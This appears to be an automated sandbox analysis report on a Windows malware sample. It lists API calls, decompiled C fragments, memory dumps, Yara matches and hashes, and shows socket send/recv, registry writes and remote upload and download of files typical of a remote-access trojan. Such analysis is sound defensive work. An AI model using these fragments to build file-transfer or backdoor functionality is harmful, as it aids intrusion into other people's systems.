                                                                                  • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                  • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                  • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                                                                • String ID:
                                                                                • API String ID: 4160275866-0
                                                                                • Opcode ID: b2e0470a93ee0f3f7cf7b71ac6b7d48d6e6ad16f6805a67cf5153e056b09b440
                                                                                • Instruction ID: a30d44c29fbcbd94969b178d1547bfdf4262e3352807cc03f3af364f17bb576d
                                                                                • Opcode Fuzzy Hash: b2e0470a93ee0f3f7cf7b71ac6b7d48d6e6ad16f6805a67cf5153e056b09b440
                                                                                • Instruction Fuzzy Hash: C9F04F7280010EABCF01AFA5DC458EE7B79BB04208F004829F92522060E67695A4DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                                                                  • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                                                                  • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                                                                  • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                                                                  • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                                                                  • Part of subcall function 00402440: #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024BB
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 382206802-0
                                                                                • Opcode ID: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                                                                • Instruction ID: d9a2345f5f1697b642a9e7ab7bc87c8d23e46c7080ea0e2ac139fbaf6b3ea179
                                                                                • Opcode Fuzzy Hash: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                                                                • Instruction Fuzzy Hash: 97D0123650011CBBCB007FE9EC098D97B68DB452A5740C465FE1587261EA729620D7D5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __dllonexit_onexit
                                                                                • String ID:
                                                                                • API String ID: 2384194067-0
                                                                                • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                                                                • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                                                                • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                                                                • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 80%
                                                                                			E00402038(intOrPtr* __ecx) {
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr* _t9;
                                                                                
                                                                                				_t9 = __ecx;
                                                                                				if( *0x41b730 != 0) {
                                                                                					L2:
                                                                                					_push(6);
                                                                                					_push(1);
                                                                                					_push(0); // executed
                                                                                					L0041418E(); // executed
                                                                                					 *_t9 = _t6;
                                                                                					if(_t6 != 0xffffffff) {
                                                                                						 *(_t9 + 0x38) =  *(_t9 + 0x38) & 0x00000000;
                                                                                						 *(_t9 + 0x39) =  *(_t9 + 0x39) & 0x00000000;
                                                                                						 *((intOrPtr*)(_t9 + 0x34)) = 0x3e8;
                                                                                						return _t6;
                                                                                					} else {
                                                                                						goto L3;
                                                                                					}
                                                                                				} else {
                                                                                					_t6 = E00402074(); // executed
                                                                                					if(_t6 == 0) {
                                                                                						L3:
                                                                                						return 0;
                                                                                					} else {
                                                                                						goto L2;
                                                                                					}
                                                                                				}
                                                                                			}






                                                                                APIs
                                                                                • #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 00402074: #115.WS2_32(00000202,?), ref: 00402089
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: #115
                                                                                • String ID:
                                                                                • API String ID: 646222842-0
                                                                                • Opcode ID: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                                                                • Instruction ID: 9496cea1f1e3f543e84bf9b8819d2566c755aa2e8cb9b0b358b440cdad1f8944
                                                                                • Opcode Fuzzy Hash: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                                                                • Instruction Fuzzy Hash: 0FE026204487A121EFB02B20678D3C32BC11B02738F0016AEF280769D3C3FC1485C388
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 16%
                                                                                			E0040209B(intOrPtr* __ecx, void* _a4) {
                                                                                				signed int _t3;
                                                                                
                                                                                				_t1 = __ecx + 4; // 0x41be74
                                                                                				_t3 = _t1;
                                                                                				_push(0x10);
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				_push(_t3);
                                                                                				_push( *__ecx);
                                                                                				asm("movsd"); // executed
                                                                                				L0041419A(); // executed
                                                                                				asm("sbb al, al");
                                                                                				return  ~_t3 + 1;
                                                                                			}





                                                                                APIs
                                                                                • #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                                                                • Instruction ID: 87562d7c3fa6cfb31469a52a797acd734afc423ba1c102534055d0d979432199
                                                                                • Opcode Fuzzy Hash: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                                                                • Instruction Fuzzy Hash: 15D0A73308052C7AC900DDA4EC02DF7375DDB83B60F104416FE018F052C293A59691D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E00402074() {
                                                                                				char _v404;
                                                                                				signed int _t2;
                                                                                				char _t4;
                                                                                
                                                                                				_t2 =  &_v404;
                                                                                				_push(_t2);
                                                                                				_push(0x202); // executed
                                                                                				L00414194(); // executed
                                                                                				asm("sbb al, al");
                                                                                				_t4 =  ~_t2 + 1;
                                                                                				 *0x41b730 = _t4;
                                                                                				return _t4;
                                                                                			}







                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: #115
                                                                                • String ID:
                                                                                • API String ID: 646222842-0
                                                                                • Opcode ID: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                                                                • Instruction ID: aaec609cd6a5438bb82df53de8e824b0c91ee93dfa3372403453e0fac8186511
                                                                                • Opcode Fuzzy Hash: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                                                                • Instruction Fuzzy Hash: 4AC08C3149431C6DEA02A3B5990BBE5776CD35EB44F4002BAAA11830D7D384955D42B6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403C60
                                                                                • SetEvent.KERNEL32(?), ref: 00403C69
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403C72
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6D195DF0), ref: 00403C8A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00403C9B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403CAA
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D11
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D27
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00403D5F
                                                                                  • Part of subcall function 00403816: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                                                                  • Part of subcall function 00403816: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                                                                  • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                                                                  • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                                                                  • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 00403D7A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DB1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403DD6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 00404199
                                                                                • atoi.MSVCRT ref: 004041A0
                                                                                  • Part of subcall function 00403473: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(Function_0001B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                                                                  • Part of subcall function 00403473: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                                                                  • Part of subcall function 00403473: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                                                                  • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                                                                  • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                                                                  • Part of subcall function 00403473: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                                                                  • Part of subcall function 00403473: recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                                                                  • Part of subcall function 00403473: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                                                                  • Part of subcall function 00403473: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                                                                  • Part of subcall function 00403473: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                                                                  • Part of subcall function 00403473: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                                                                  • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004041C3
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041E1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041EE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404202
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 00404223
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040422D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404237
                                                                                  • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040424C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040427E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040428B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040429F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 004042AB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004042C2
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                                                                  • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                                                                  • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                                                                  • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                                                                  • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                                                                  • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404300
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404311
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404325
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404331
                                                                                • closesocket.WS2_32(?), ref: 0040433A
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000001,00000000,00000000), ref: 004043F7
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404401
                                                                                • CreateDirectoryW.KERNEL32(00000000,?,?,00000001,00000000,00000000), ref: 00404408
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404414
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404420
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A,?,?,00000001,00000000,00000000), ref: 0040442B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 0040443A
                                                                                • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6D195DF8,00000001,00000000), ref: 00404489
                                                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 00404499
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 004044AE
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004044B8
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004044C2
                                                                                • _wrename.MSVCRT ref: 004044C9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004044E0
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 00404587
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00404591
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040459D
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045A6
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 004045AD
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045BA
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
